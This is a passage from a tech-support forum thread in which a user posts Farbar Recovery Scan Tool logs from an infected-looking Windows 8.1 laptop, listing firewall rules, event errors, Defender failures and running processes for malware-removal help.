FirewallRules: [{2029387B-0B9A-48C5-8D70-D9624A75818D}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{23995299-1FD2-4CFE-B8AF-2086099394E8}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{0DD782B8-3E36-4357-B248-4A58956BA95E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{3435D53E-9FD6-4668-BF9A-6D30B08E5FEE}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FF5E24B4-1562-4D0E-B0F0-B909F14E18B7}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FBB98ABC-9569-4C9B-ACD7-72394C22E85A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{7D2A9822-B4AC-4027-8630-BBA86B2B3250}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{B61AADD3-2D37-49CE-8846-3DBE50FB4B8A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{2DA2B986-7667-4D2C-9E85-C2F81B954DE6}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [{2FE73EE5-6FB3-4DC8-9CFF-B1AD59033BDD}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [TCP Query User{5AC03A41-337A-4D35-8475-DBF7FCF3718C}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{3A9F9831-57E1-4FDB-984D-672AA8256557}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [{57579DAD-B0A7-4600-BACB-ACFBD0BF582E}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{20046B7C-7FC0-4DAC-81CD-B157DC013E33}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [TCP Query User{210A33E9-6B2B-44CF-BCF6-D34BC763A901}C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{BC1DE14B-4640-475C-A83B-879941C715F5}C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{207663F4-14AA-4B8C-8B75-0E34AECA606F}] => (Block) C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{5F89233A-ABDC-4FF1-9263-2D96AFE62121}] => (Block) C:\program file (x86) dvdsoft two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{803AE086-7E6A-48E0-8802-785AA4FC4A01}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [UDP Query User{DD0732C4-EE26-4E6D-9566-D42C50E770DC}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [{92D3E127-A9C9-4A57-A4DE-C37C30EEC069}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{6D97C59F-C2D5-4B5F-A2EB-62DED9A63774}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{595BE6ED-4AE7-4E50-8492-81EF52DC503B}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{51406614-36DB-4932-854C-7354C320CCCE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{0FD1A6F0-6892-4528-8D02-6DA308CE78B8}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F5C52100-551E-41EB-9F6B-22785A10B72E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F90CFC89-D1E5-47FE-810D-4C2A003E3EC4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{B4D1EF72-3517-40C5-A216-D67E59703BD4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{95D8704A-2EE2-4ABF-A286-E107F9FE797F}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{4819C0F7-D28C-465D-9F1B-E02D925E86AE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{FC9BC8BE-3785-41F0-9673-77798F53F411}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{97D423F4-0FDF-4C9C-9062-3118615A659E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{F3617F33-975E-49A1-82F7-525FC3550128}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{A279D673-8345-423B-A713-D33AE6388178}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{2AC43D62-7AC9-47C0-9BAF-E92B1B7BBA30}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{C12F076D-5E2B-450E-91A2-3D08D18E1937}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{3D3CF842-8298-442A-B9C9-A5399B012E71}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{C31226E6-F861-4DEA-B2FD-2634BE6F0129}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{D12533D4-1609-4FAF-85BD-3A23601A19D7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C02EE326-2CB8-4B8B-85EE-B9EF5101D2FC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E6F43DE1-5773-4F5C-997C-8F9A152B8CC6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4A1A6E79-2801-44AC-93C6-A5698676BF58}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{447CC466-EC34-4DCC-9474-38A417083D49}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{B6E8D305-52B5-45E2-8C5A-2EE37A8ADB44}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{0649CB28-67B5-48B4-B97E-CDA231670A45}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{5BAD7087-DE25-4030-A16A-578CD107BD81}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{BF1E40F5-A2D7-4946-895B-E0067521547F}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [{17ED7A00-1D80-4074-B1AB-25880A7BB6B6}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [TCP Query User{396BBCA8-02CB-4338-8B42-915ECADCD922}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{73E87333-E910-4EEC-804C-17612FDD0764}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{9E3E9781-622A-4CDF-A7EF-F851961BEA19}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{7C52A72D-17FC-484E-A819-81F527082F0F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\Resolve.exe
FirewallRules: [{5B94E67F-A6E7-4C37-B249-3CED37E49F0D}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\bmdpaneld.exe
FirewallRules: [{BA3F2295-A446-4372-A933-C67E6917CAA9}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\JLCooperPanelDaemon.exe
FirewallRules: [{AF2811BE-4318-4F7F-8F60-8E10AD92B8F2}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\EuphonixPanelDaemon.exe
FirewallRules: [{9D04EBDE-0FDE-4918-94E4-D40C3C002C6F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\TangentPanelDaemon.exe
FirewallRules: [{BDA720FB-BED0-4342-84C3-1AF5017ECCAA}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\ElementsPanelDaemon.exe
FirewallRules: [{56DE631C-A030-4DF6-B707-2D24656517FF}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\DPDecoder.exe
FirewallRules: [{B0D56FFA-C1C5-488E-B442-2038AC05A5A6}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe
FirewallRules: [TCP Query User{80D1B33D-1849-4BEE-B7BB-78C9D2D3F544}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [UDP Query User{B40DADB6-9E25-4951-B741-8458BE0396EE}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [{9B19D861-CA78-446B-AD40-2E9AA11FDFB5}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{9A1FF358-15BA-4495-8972-7D4A585582FE}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{DFD16930-C6D4-42A7-8594-A07EAE59D209}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{96FED481-82D0-450B-85C3-36735EB1549F}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) [font=simsun]㩃停潲牧浡䘠汩獥[font='segoe ui symbol', sans-serif]⠠[font=simsun]㡸[font='cambria math', serif]⤶[font=simsun]睜湩晤湩層楷摮楦摮攮數
FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) [font=simsun]㩃停潲牧浡䘠汩獥[font='segoe ui symbol', sans-serif]⠠[font=simsun]㡸[font='cambria math', serif]⤶[font=simsun]睜湩晤湩層楷摮楦摮⹟[font=simsun]硥e
FirewallRules: [{D61EF620-8F0B-40A6-9BB7-E836DA310B7C}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{91606396-6288-43E6-AE6F-EEB421C75181}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{807550B5-7265-4327-9B16-266D34A7742C}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{EE7BB404-A2CF-4E23-A355-EA7C2D953145}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{7C716CAC-0CA5-496D-B6B1-DBB04F82E573}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{047E31DF-A255-4F4C-9FE9-45DD54A3AB3B}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{B06B32BA-F38C-4C17-B422-99E7605B0063}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{E511541B-CD44-4376-A542-B6A6578FA8EE}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{068BAA54-B58F-43B6-8ADB-31E4DEE03ACC}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{B44756B4-DFCA-4CC9-953C-CCE8AE6CC11A}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{3C331E6B-E428-4D0C-BEA4-0FA06032B9D0}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{D450C4CE-50CA-4D6B-A47C-AF19379507B1}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{640DFB21-833E-420D-B80D-AC0DD899B614}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{6CAA584E-EA21-4F97-9554-1E5312569977}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{099E93F9-CFBA-4E6D-A852-0EFDF6E69C77}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{10B74A86-9FC5-4D84-955B-4B2C2FAADC83}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{65FA2FF6-971C-44E8-8D5E-C565539E0181}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{88078A39-6DBF-4310-9720-BC7A9811094B}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{5D12474E-76BE-4D8A-8BD7-4CECA0F32CFB}] => (Allow) C:\Users\Dan\AppData\Local\Kometa\Application\kometa.exe
FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) [font=simsun]㩃停潲牧浡䘠汩獥[font='segoe ui symbol', sans-serif]⠠[font=simsun]㡸[font='cambria math', serif]⤶[font=simsun]䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬攮數
FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) [font=simsun]㩃停潲牧浡䘠汩獥[font='segoe ui symbol', sans-serif]⠠[font=simsun]㡸[font='cambria math', serif]⤶[font=simsun]䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬⹟[font=simsun]硥e
FirewallRules: [{8269955E-0B8F-464C-B326-2023E770CABC}] => (Allow) C:\Program Files (x86)\Henwood\fontenot.exe
FirewallRules: [{3606180A-FA39-4B14-88F6-E879C8BB4B0B}] => (Allow) C:\Program Files (x86)\Police\fontenot.exe
FirewallRules: [{99FAD6CC-61D4-4806-B204-7F3641DDD7F3}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [{6CCE0F5A-ED5B-48E9-898C-B3168715BED1}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [TCP Query User{9536F0CC-5E66-46E8-805B-67D9697C530F}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{C5258519-221C-4A37-A687-51526258F672}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{5507329C-601E-4572-9AD8-6C16774E1ADC}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{187A8271-92D7-449D-8643-56ECD2671F9C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C260D9CD-8DD2-4B5A-8BDE-C4CFD01C9F25}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DB1E8DAE-0016-43D8-BB69-DC8005FC9089}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{EA5A15E3-2AE2-47A4-AB76-6A52AAB47F97}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{31F2912A-119F-44BD-A9EB-53A4D506D23B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

ATTENTION: System Restore is disabled

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (05/31/2018 08:51:33 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:51:33Z. Error Code: 0x80070020.

Error: (05/31/2018 08:51:03 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:51:03Z. Error Code: 0x80070020.

Error: (05/31/2018 08:50:33 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:50:33Z. Error Code: 0x80070020.

Error: (05/31/2018 08:50:03 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:50:02Z. Error Code: 0x80070020.

Error: (05/31/2018 08:49:32 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:49:32Z. Error Code: 0x80070020.

Error: (05/31/2018 08:49:02 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:49:02Z. Error Code: 0x80070020.

Error: (05/31/2018 08:48:32 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:48:32Z. Error Code: 0x80070020.

Error: (05/31/2018 08:48:02 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-08T00:48:02Z. Error Code: 0x80070020.


System errors:
=============
Error: (05/31/2018 08:39:15 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:15 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:15 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:15 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:15 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:11 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:11 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (05/31/2018 08:39:11 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.


Windows Defender:
===================================
Date: 2015-02-02 09:49:52.792
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {4BF9AF7B-A43D-4E64-B277-DEFB56CDC0E3}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2015-02-02 08:06:18.260
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {16FD4F1F-550C-4A26-9400-0412629CFD5A}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2015-02-01 10:17:58.118
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {BADC4EF7-6BAD-444C-AB05-92085B6CF93D}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2015-02-01 08:23:26.263
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {C9B87AF6-96B3-4644-9422-EB0CED28391C}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2015-01-31 08:30:36.872
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {4D8C80CB-F50C-47EE-94E8-DC02EC0EE056}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2015-02-01 05:57:28.954
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version:
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved

Date: 2015-02-01 05:57:28.938
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version:
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved

Date: 2015-02-01 05:57:28.938
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version:
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved

Date: 2015-02-01 05:57:28.844
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version:
Previous Engine Version: 1.1.10302.0
Error code: 0x8024402c
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Date: 2015-01-30 05:22:07.607
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version:
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved

CodeIntegrity:
===================================

Date: 2018-05-31 20:26:36.690
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-30 20:23:16.216
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-29 20:18:30.477
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-28 20:19:31.437
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-27 20:15:46.268
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-26 19:41:39.042
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-25 20:17:17.572
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-24 20:18:24.997
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel® Celeron® CPU N2830 @ 2.16GHz
Percentage of memory in use: 48%
Total physical RAM: 3982.68 MB
Available physical RAM: 2066.01 MB
Total Virtual: 4686.68 MB
Available Virtual: 2804.26 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:444.65 GB) (Free:149.08 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: () (Removable) (Total:7.45 GB) (Free:3.35 GB) FAT32

\\?\Volume{3e80ab0f-bf50-4f22-8c02-3c22ee1a6bb4}\ (Recovery) (Fixed) (Total:0.88 GB) (Free:0.59 GB) NTFS
\\?\Volume{436d9e19-7fb5-4350-864c-86573ec335b2}\ () (Fixed) (Total:0 GB) (Free:0 GB)

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 3F7852A4)

Partition: GPT.

========================================================
Disk: 1 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of.txt ============================

Edited by Oh My!, 02 June 2018 - 07:59 AM.


#7 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:08:03 AM

Posted 01 June 2018 - 11:24 AM

Here's the FRST txt


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 16.05.2018 01
Ran by Dan (administrator) on BEATLES (31-05-2018 20:48:33)
Running from C:\Users\Dan\Desktop
Loaded Profiles: Dan (Available Profiles: Dan)
Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(TOSHIBA CORPORATION) C:\Windows\System32\avmhengsvc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
() C:\ProgramData\dahhService\dahhService.exe
() C:\Program Files\Gramblr\gramblr.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
